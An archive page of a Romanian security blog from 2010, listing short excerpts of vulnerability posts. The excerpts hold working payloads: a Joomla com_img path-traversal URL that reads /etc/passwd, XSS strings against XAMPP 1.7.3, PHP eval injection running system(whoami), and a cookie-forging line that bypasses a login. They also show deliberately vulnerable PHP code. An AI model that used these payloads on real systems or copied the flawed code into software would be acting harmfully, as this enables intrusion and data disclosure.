Arhiva | Vulnerabilitati RSS pentru aceasta categorie
Joomla com_img – Local File Inclusion - Securitatea Informatica

Joomla com_img – Local File Inclusion

Data: 10 noiembrie 2010 Descriere: Vulnerabilitate LFI (includere de fisier local) in componenta Joomla com_img. Exploit: http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00

Citeşte mai mult
Vulnerabilitati PHP – Remote Command Execution - Securitatea Informatica

Vulnerabilitati PHP – Remote Command Execution

Sfaturi : Dacă un script foloseşte exec() nu vom putea vedea rezultatul comenzii (dar comanda este executată) până când rezultatul nu este printat din script. Putem folosii operatorul OR ( || ) dacă scriptul execută mai mult de o comandă. În PHP există câteva comenzi prin intermediul cărora putem executa comenzi: exec — Execută un [...]

Citeşte mai mult
IBM WebSphere – SQL Inject in consola de administrare - Securitatea Informatica

IBM WebSphere – SQL Inject in consola de administrare

Data: 18 noiembrie 2010 Descriere: O vulnerabilitate a fost raportată la IBM WebSphere Commerce, care pot fi exploatate de către utilizatorii rău intenţionaţi să efectueze atacuri SQL inject. Inputul trimis catre consola admin nu este curatat inainte de queryurile SQL. Acest lucru poate fi exploatat pentru a manipula interogări SQL prin injectarea de cod arbitrar [...]

Citeşte mai mult
Xampp 1.7.3 – vulnerabilitati multiple - Securitatea Informatica

Xampp 1.7.3 – vulnerabilitati multiple

Data: 6 noiembrie 2010 Descriere: XAMPP este o distribuţie Apache care conţin MySQL, PHP şi Perl. Vulnerabilitati: http://localhost/xampp/ming.php/”<script>alert(“XSS”)</script> http://localhost/xampp/iart.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/cds.php/’onmouseover=alert(“XSS”)> http://localhost/xampp/aspinfo.asp/1<script>alert(“XSS”)</script> http://localhost/xampp/adodb.php/”onmouseover=prompt(“XSS”)> http://localhost/xampp/perlinfo.pl/1<script>prompt(“XSS”)</script> Aparare: Producatorul ar trebui să filtreze caracterele speciale din formulare. Clienţii ar trebui să stabilească parola de acces la XAMPP folder.

Citeşte mai mult
Vulnerabilitati PHP –  Remote Code Execution - Securitatea Informatica

Vulnerabilitati PHP – Remote Code Execution

Exemplu de bază Cod: <?php $code=$_GET['code']; eval($code); ?> Funcţia “eval” evaluează un string ca şi cod PHP. În acest caz, putem executa cod PHP. Exemplu : http://127.0.0.1/test.php?code=phpinfo(); http://127.0.0.1/test.php?code=system(whoami); Şi vom obţine rezultatul codului PHP injectat de către noi. Exemplu simplu Cod: $conf = array_merge($conf,$confweb); } @eval(stripslashes($_REQUEST['anticode'])); if ( $_SERVER['HTTP_CLIENT_IP'] ) Putem vedea că valoarea variabilei ”anticode” este cerută prin metoda [...]

Citeşte mai mult
Vulnerabilitati PHP –  Insecure Cooke Handling - Securitatea Informatica

Vulnerabilitati PHP – Insecure Cooke Handling

Scrie codul în URL-bar, nu utiliza un cookie editor pentru asta. Exemplu de bază Cod: <?php if($_POST['password'] == $thepass) { setcookie(“is_user_logged”,”1″); } else { die(“Login failed!”); } //………… etc …………….. if($_COOKIE['is_user_logged']==”1″) include ”admin.php”; else die(‘not logged’); ?> Ceva interesant aici. Dacă atribuim valoarea “1″ variabilei “is_user_logged” salvată în cookie vom fi logaţi. Exemplu: javascript:document.cookie = “is_user_logged=1; path=/”; Suntem logaţi, trecem de verificare [...]

Citeşte mai mult
Pagina 3 din 512345
This site is protected by Comment SPAM Wiper. This site is protected by WP-CopyRightPro